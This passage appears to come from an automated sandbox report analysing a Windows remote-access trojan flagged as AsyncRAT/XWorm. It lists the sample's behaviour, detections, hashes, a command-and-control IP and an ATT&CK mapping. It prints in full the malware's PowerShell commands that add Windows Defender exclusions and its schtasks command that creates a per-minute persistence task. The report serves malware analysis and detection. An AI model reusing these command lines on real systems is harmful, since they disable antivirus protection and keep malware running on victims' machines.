            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4524 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616 Thread sleep count: 2018 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836 Thread sleep count: 8303 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724 Thread sleep count: 1379 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe TID: 2508 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe TID: 1900 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe File Volume queried: C:\ FullSizeInformation
            Source: file.exe, 00000000.00000002.3313459605.000000001C1E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWrkfl%SystemRoot%\system32\mswsock.dllng>
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe'
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
            Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeQueries volume information: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe VolumeInformation
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeQueries volume information: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe VolumeInformation
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000000.00000002.3313459605.000000001C25B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3313459605.000000001C1E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.0.file.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3364, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, type: DROPPED

            Remote Access Functionality

Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.0.file.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3364, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, type: DROPPED
ATT&CK matrix (one tactic column per line; a number in front of a technique is the count shown in the report for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 11 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 131 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 221 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1572730 | Sample: file.exe | Startdate: 10/12/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
  Started: file.exe 7 (node 7); AzureConnect.exe (node 12); AzureConnect.exe (node 14)

file.exe (node 7)
  DNS/IP: 147.185.221.24, ports 3804, 49797, 49803, SALSGIVERUS, United States; 127.0.0.1, unknown, unknown
  Dropped: C:\ProgramData\...\AzureConnect.exe, PE32
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 2 other signatures
  Started: powershell.exe 23 (node 16); powershell.exe 22 (node 19); powershell.exe 23 (node 21); 2 other processes (node 23)

powershell.exe (node 16)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe (node 25)

powershell.exe (node 19)
  Started: conhost.exe (node 27)

powershell.exe (node 21)
  Started: conhost.exe (node 29)

2 other processes (node 23)
  Started: conhost.exe (node 31); conhost.exe (node 33)

Source | Detection | Scanner | Label
file.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
file.exe | 100% | Avira | HEUR/AGEN.1305769
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | 100% | Avira | HEUR/AGEN.1305769
C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://go.microsoft.c | 0% | Avira URL Cloud | safe
http://crl.micros | 0% | Avira URL Cloud | safe
http://crl.micros1 | 0% | Avira URL Cloud | safe
147.185.221.24 | 0% | Avira URL Cloud | safe
https://go.microsoft.co | 0% | Avira URL Cloud | safe
http://www.apache.o | 0% | Avira URL Cloud | safe
            No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
147.185.221.24 | true | Avira URL Cloud: safe | unknown
127.0.0.1 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2126110670.000001DB10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221822786.00000239A3851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2354795322.0000023FB0271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.microsoft.co | powershell.exe, 00000008.00000002.2371240954.0000023FB85E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micros | powershell.exe, 0000000A.00000002.2572896915.000002015E440000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2106136819.000001DB00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.0000023993A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micros1 | powershell.exe, 00000002.00000002.2137614904.000001DB7BB30000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2106136819.000001DB00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.0000023993A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2126110670.000001DB10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221822786.00000239A3851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2354795322.0000023FB0271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://go.microsoft.c | powershell.exe, 00000005.00000002.2166015736.0000023991C49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.microsoft.ctain | powershell.exe, 00000005.00000002.2166015736.0000023991C49000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2106136819.000001DB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.00000239937E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146101000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.o | powershell.exe, 00000002.00000002.2137177899.000001DB7BAAA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | file.exe, 00000000.00000002.3283038560.0000000003201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2106136819.000001DB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.00000239937E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146101000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micros | powershell.exe, 0000000A.00000002.2577205128.000002015E5E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
147.185.221.24 | unknown | United States | 12087 | SALSGIVERUS | true

IP (private)
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572730
Start date and time: 2024-12-10 19:44:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@18/19@0/2
EGA Information:
• Successful, ratio: 14.3%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 59
• Number of non-executed functions: 5
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target AzureConnect.exe, PID 1772 because it is empty
• Execution Graph export aborted for target AzureConnect.exe, PID 6540 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1352 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1876 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 320 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5240 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: file.exe
Time | Type | Description
13:45:08 | API Interceptor | 54x Sleep call for process: powershell.exe modified
13:46:01 | API Interceptor | 117439x Sleep call for process: file.exe modified
19:46:03 | Task Scheduler | Run new task: AzureConnect path: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe
Match | Associated Sample Name / URL | Detection | Threat Name
147.185.221.24 | NhoqAfkhHL.bat | malicious | Unknown
 | a4lIk1Jrla.exe | malicious | Njrat, RevengeRAT
 | W6s1vzcRdj.exe | malicious | XWorm
 | u7e3vb5dfk.exe | malicious | XWorm
 | aOi4JyF92S.exe | malicious | XWorm
 | PG4w1WB9dE.exe | malicious | AsyncRAT, XWorm
 | a4BE6gJooT.exe | malicious | XWorm
 | grK0Oh8p4Z.exe | malicious | AsyncRAT, XWorm
 | SplpM1fFkV.exe | malicious | Unknown
 | msedge.exe | malicious | AsyncRAT, XWorm
No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
SALSGIVERUS | NhoqAfkhHL.bat | malicious | Unknown | 147.185.221.24
 | sora.mpsl.elf | malicious | Mirai | 147.160.103.28
 | a4lIk1Jrla.exe | malicious | Njrat, RevengeRAT | 147.185.221.24
 | W6s1vzcRdj.exe | malicious | XWorm | 147.185.221.24
 | u7e3vb5dfk.exe | malicious | XWorm | 147.185.221.24
 | aOi4JyF92S.exe | malicious | XWorm | 147.185.221.24
 | ozgpPwVAu1.exe | malicious | XWorm | 147.185.221.22
 | PG4w1WB9dE.exe | malicious | AsyncRAT, XWorm | 147.185.221.24
 | a4BE6gJooT.exe | malicious | XWorm | 147.185.221.24
 | grK0Oh8p4Z.exe | malicious | AsyncRAT, XWorm | 147.185.221.24
No context
No context
Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 46592
Entropy (8bit): 6.045708896884392
Encrypted: false
SSDEEP: 768:JXDCY0GcQ5pcP7tbaRcqKlnFPc9Goxq6sOuhe/gDu/cjGBd00:JOLeKkRMFk9Gv6sOuOUzGBdl
MD5: 2982D11D3B0789476831097F0E213007
SHA1: B2B7D5F73B65C3DF4D3DA8A5A266F47D3685A044
SHA-256: BDFF38AE5B6AC3AB4135894064D15E3AB14EFE28B9463C98B185FB0CDFD3AD1F
SHA-512: B496DB043EE6758E63C3F2AA2E2B03775EAAF657638DAA0B989ED85221A4C98FB7FBD53F836CA4D12DCF1C536222D65D398D543F39AD0447666E4842A39F8CDE
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Hg................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......(_...T............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                              Process:C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):654
                                                              Entropy (8bit):5.380476433908377
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
